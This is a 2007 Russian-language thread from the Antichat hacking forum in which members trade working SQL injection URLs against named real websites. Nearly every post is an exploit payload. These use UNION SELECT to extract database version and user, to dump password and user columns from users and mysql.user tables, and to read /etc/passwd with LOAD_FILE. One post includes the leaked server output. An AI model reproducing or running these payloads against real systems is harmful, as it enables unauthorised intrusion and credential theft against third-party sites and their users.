 |
|

29.09.2007, 19:47
|
|
Познавший АНТИЧАТ
Регистрация: 23.08.2007
Сообщений: 1,237
С нами:
9851426
Репутация:
1676
|
|
и шоб не оффтопить вот ещё она. нераскрученная
http://www.ihrc.org.uk/show.php?id=650'
Cойдет?
http://www.ihrc.org.uk/show.php?id=-1+union+select+1,2,database(),version(),user(),5,6 ,7,8,9,10,11,12/*
|
|
|

29.09.2007, 20:38
|
|
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
С нами:
9920546
Репутация:
1796
|
|
Сообщение от fobofob
Впервые вижу уязвимость в html скрипте 8),сам раскрутить не смог,может у кого получится ;)
код:
http://www.vakansii.com.ua/showArticleNames.html?id=24+order+by+2/*
Там третья версия:
Код:
http://www.vakansii.com.ua/showArticleNames.html?id=24+OR 1=IF(SUBSTRING(VERSION(),1,1)=3,1,0)/*
А в третьей версии ни подзапросов ни юниона нет... Можно если комуто совсем надо только подбирать ;)
__________________
Кто я?..
|
|
|

29.09.2007, 20:46
|
|
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
С нами:
9920546
Репутация:
1796
|
|
Код:
http://www.miga.org/sitelevel2/level2.cfm?id=1069%27
Там Oracle. Я тут не рулю... 
__________________
Кто я?..
|
|
|

29.09.2007, 21:04
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
С нами:
10243046
Репутация:
3033
|
|
Ув. господа требуются добровольцы для апгрейта антибояна. С 300 по 323 стр. Желающие добро пожаловать в осику 480596. Спасибо
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
|
|
|

29.09.2007, 21:14
|
|
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
С нами:
9920546
Репутация:
1796
|
|
Код:
http://gamers.eurogamer.net/giveaways.php?id=-8 UNION SELECT 1,2,AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(' ',VERSION(),DATABASE(),USER()),'1'),'1'),4,5,6,7,8,9,10,11/*
4.1.13-standard-log : eurogamer : masterwww@192.168.1.3
__________________
Кто я?..
|
|
|

30.09.2007, 02:11
|
|
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
С нами:
10374086
Репутация:
1745
|
|
Код:
http://www.hamo.es/es/news.php?id=-2+union+select+1,2,column_name,4,5,6,7,8,9+from+information_schema.columns/*
|
|
|

30.09.2007, 12:40
|
|
Познавший АНТИЧАТ
Регистрация: 13.04.2006
Сообщений: 1,738
С нами:
10566621
Репутация:
1198
|
|
thinkpackaging.com Провайдер, регистрирует доменные имена и предоставляет хостинг =) п.с. хотел найти что-нибудь подходящее, дорого ибо =)
Код:
http://www.thinkpackaging.com/view_company.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,version(),22,23,24+from+company/*
|
|
|

30.09.2007, 16:48
|
|
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
С нами:
9881483
Репутация:
569
|
|
код:
http://goroskop.a.org.ua/?id=-12+union+select+1,2,CAST(concat_ws(0x3a,version(), user(),database())+AS+BINARY),4/*
|
|
|

30.09.2007, 16:57
|
|
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
С нами:
9828237
Репутация:
778
|
|
Код:
http://www.endiama.co.ao/news.php?id=-1+union+select+1,2,3,4,aes_decrypt(aes_encr ypt (version(),0x 71),0x71)/*
Код:
http://www.endiama.co.ao/news.php?id=-1+union+selec t+1,2,p assword,4,5+from+users/*
Код:
http://newwebstudio.com/bg/Services.php?id=-1+union+select+1,2,AES_DECRY PT(AES_ENCRYPT(VE RSION(),0x71),0x71),4,5/*
Код:
http://www.garantovany-dodavatel.com/www/forum_read.php?id=-1+union+select+1,2,3,4 ,concat (user(),0x3a,version(),0x 3a,database()),6/*
|
|
|

30.09.2007, 22:12
|
|
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
С нами:
10305026
Репутация:
187
|
|
источник: http://www.xakep.ru/post/40386/default.asp
------------------------------------
ActiveKB Knowledgebase 2.x
------------------------------------
Код:
http://support.lexiconn.com/kb/index.php?ToDo=browse&catId=-10+union+select+1,LOAD_FILE(%200x2f6574632f706173737764),3,4,5,6,7+members/*
Код:
http://www.randomhouse.com/about/faq/index.php?ToDo=browse&catId=-20+union+select+1,password,user,4,5,6,7%20from%20mysql.user/*
Код:
http://www.booklounge.ca/about/faq/index.php?ToDo=browse&catId=-10+union+select+1,password,user,4,5,6,7%20from%20mysql.user/*
Код:
http://olseninvest.com/faq/index.php?ToDo=browse&catId=-10+union+select+1,LOAD_FILE(%200x2f6574632f706173737764),3,4,5,6,7%20from%20mysql.user/*
----------------------------------
Код:
http://www.lcn.biz/faq/index.php?ToDo=browse&catId=-10+union+select+1,user,password,4,5,6,7%20from%20mysql.user/*
Код:
http://www.lcn.biz/faq/index.php?ToDo=browse&catId=-10+union+select+1,LOAD_FILE(0x2f6574632f706173737764),3,4,5,6,7%20from%20mysql.user/*
----------------------------------
Код:
http://www.fastsurf.com/faqs/index.php?ToDo=browse&catId=-10+union+select+1,password,username,4,5,6,7%20from%20user/*
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|